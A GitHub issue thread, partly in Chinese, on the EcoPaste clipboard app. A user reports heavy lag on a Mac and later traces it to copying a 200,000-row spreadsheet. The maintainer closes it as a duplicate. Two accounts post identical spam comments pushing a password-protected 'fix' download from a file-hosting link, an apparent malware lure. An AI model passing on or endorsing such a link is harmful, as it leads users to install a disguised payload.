### ISSUE TITLE
[bug] 0.0.6这个情况是不是内存溢出了？

### ISSUE THREAD

**Issue by gitca233** [ayangweb/EcoPaste#461] opened 2024-08-27 04:11 UTC
### Describe the bug

![iShot_2024-08-27_12 05 52](https://github.com/user-attachments/assets/c4758e2f-38ad-4608-b06b-0596193a0023)

MacBook air M2 8G 14.5系统
打开以后非常卡顿，然后查看监视器情况如截图所示

### Application and system information

```text
0.0.6
```

**Comment by jia6214876** [comment] 2024-08-27 04:12
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment] 2024-08-27 04:13
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ayangweb** [comment] 2024-08-27 04:27
收到反馈，我们下来排查下

**Comment by gitca233** [comment] 2024-08-27 04:49
复制了20万行的excel导致的；
打开软件后快速进入目录，删除数据库目录所有文件，重新打开软件即可

<img width="736" alt="image" src="https://github.com/user-attachments/assets/f553c7c8-dc4c-42dc-9c79-b4099d742d06">

**Comment by ayangweb** [comment] 2024-08-27 05:07
Duplicate of #309 

那就和这个问题重复了，这个我关了，后面我们看看怎么来优化大量数据的问题！

**Closed by ayangweb** 2024-08-27 05:07 UTC
Labels: type: bug, status: needs triage
